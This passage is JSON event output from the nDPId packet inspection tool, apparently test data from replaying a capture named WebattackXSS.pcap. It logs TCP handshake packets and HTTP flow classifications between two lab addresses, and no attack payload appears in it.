-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7210,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":2,"flow_last_seen":1499347833462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347833462,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgZimBogRMzkqiaAScSAQtwAAAgQFtAQCCAoD5gbeATw1agEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7211,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":3,"flow_last_seen":1499347833462,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347833462,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0H+NAAD4GpfWsEAABwKgKMoGYAFAzOSqJpgaIEoAQAOWvvgAAAQEICgE8NWoD5gbe"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347705116,"flow_last_seen":1499347710811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60042,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":436,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347705116,"flow_last_seen":1499347710811,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347706399,"flow_last_seen":1499347711812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60056,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347706399,"flow_last_seen":1499347711812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60056,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347709252,"flow_last_seen":1499347714812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60084,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347709252,"flow_last_seen":1499347714812,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60084,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347712277,"flow_last_seen":1499347717814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60134,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":439,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347712277,"flow_last_seen":1499347717814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60134,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347712277,"flow_last_seen":1499347717814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":440,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347712277,"flow_last_seen":1499347717814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347713588,"flow_last_seen":1499347718814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60154,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7218,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":441,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347713588,"flow_last_seen":1499347718814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347833848,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60154,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7230,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347836095,"flow_last_seen":1499347836095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347836095,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7230,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":1,"flow_last_seen":1499347836095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347836095,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Z2FAAD4GXm+sEAABwKgKMoGyAFBvhFCdAAAAAKACchDjpwAAAgQFtAQCCAoBPDf8AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7231,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":2,"flow_last_seen":1499347836095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347836095,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgbKB84w4b4RQnqAScSDJAwAAAgQFtAQCCAoD5glxATw3\/AEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7232,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":3,"flow_last_seen":1499347836096,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347836096,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Z2JAAD4GXnasEAABwKgKMoGyAFBvhFCegfOMOYAQAOVoCgAAAQEICgE8N\/0D5glx"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7239,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347837373,"flow_last_seen":1499347837373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347837373,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33216,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7239,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":1,"flow_last_seen":1499347837373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347837373,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8zIRAAD4G+UusEAABwKgKMoHAAFDQoPW4AAAAAKACchDcIQAAAgQFtAQCCAoBPDk8AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7240,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":2,"flow_last_seen":1499347837373,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347837373,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgcDH48pN0KD1uaAScSA8OQAAAgQFtAQCCAoD5gqwATw5PAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7241,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":3,"flow_last_seen":1499347837374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347837374,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0zIVAAD4G+VKsEAABwKgKMoHAAFDQoPW5x+PKToAQAOXbQAAAAQEICgE8OTwD5gqw"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7251,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347838675,"flow_last_seen":1499347838675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347838675,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33230,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7251,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":1,"flow_last_seen":1499347838675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347838675,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8apJAAD4GWz6sEAABwKgKMoHOAFDGglATAAAAAKACchCKkgAAAgQFtAQCCAoBPDqBAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7252,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":2,"flow_last_seen":1499347838675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347838675,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgc48YB01xoJQFKAScSAiAAAAAgQFtAQCCAoD5gv2ATw6gQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7254,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":3,"flow_last_seen":1499347838676,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347838676,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0apNAAD4GW0WsEAABwKgKMoHOAFDGglAUPGAdNoAQAOXBBgAAAQEICgE8OoID5gv2"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7269,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347841229,"flow_last_seen":1499347841229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347841229,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33256,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7269,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":1,"flow_last_seen":1499347841229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347841229,"pkt":"ABm5CmnxAMGxFOsxCABFAAA86g5AAD4G28GsEAABwKgKMoHoAFBN49cOAAAAAKACchB5nQAAAgQFtAQCCAoBPD0AAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7270,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":2,"flow_last_seen":1499347841229,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347841229,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgejkRPOpTePXD6AScSCQMwAAAgQFtAQCCAoD5g50ATw9AAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7271,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":3,"flow_last_seen":1499347841230,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347841230,"pkt":"ABm5CmnxAMGxFOsxCABFAAA06g9AAD4G28isEAABwKgKMoHoAFBN49cP5ETzqoAQAOUvOwAAAQEICgE8PQAD5g50"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7281,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347842491,"flow_last_seen":1499347842491,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347842491,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33270,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7281,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":1,"flow_last_seen":1499347842491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347842491,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8lUdAAD4GMImsEAABwKgKMoH2AFCtqqt8AAAAAKACchBEHwAAAgQFtAQCCAoBPD47AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7282,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":2,"flow_last_seen":1499347842491,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347842491,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQgfYhjECLraqrfaAScSDPUAAAAgQFtAQCCAoD5g+wATw+OwEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7284,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":3,"flow_last_seen":1499347842492,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347842492,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0lUhAAD4GMJCsEAABwKgKMoH2AFCtqqt9IYxAjIAQAOVuVwAAAQEICgE8PjwD5g+w"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347716243,"flow_last_seen":1499347721814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60180,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":442,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347716243,"flow_last_seen":1499347721814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60180,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347717533,"flow_last_seen":1499347722814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60194,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":443,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347717533,"flow_last_seen":1499347722814,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60194,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347720094,"flow_last_seen":1499347725815,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60220,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":444,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347720094,"flow_last_seen":1499347725815,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347721376,"flow_last_seen":1499347726816,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60234,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":445,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347721376,"flow_last_seen":1499347726816,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60234,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347724082,"flow_last_seen":1499347729818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60260,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7299,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":446,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347724082,"flow_last_seen":1499347729818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347843851,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7302,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347845077,"flow_last_seen":1499347845077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347845077,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33296,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7302,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":1,"flow_last_seen":1499347845077,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347845077,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83IxAAD4G6UOsEAABwKgKMoIQAFCGLpxOAAAAAKACchB4KAAAAgQFtAQCCAoBPEDCAAAAAAEDAwc="} 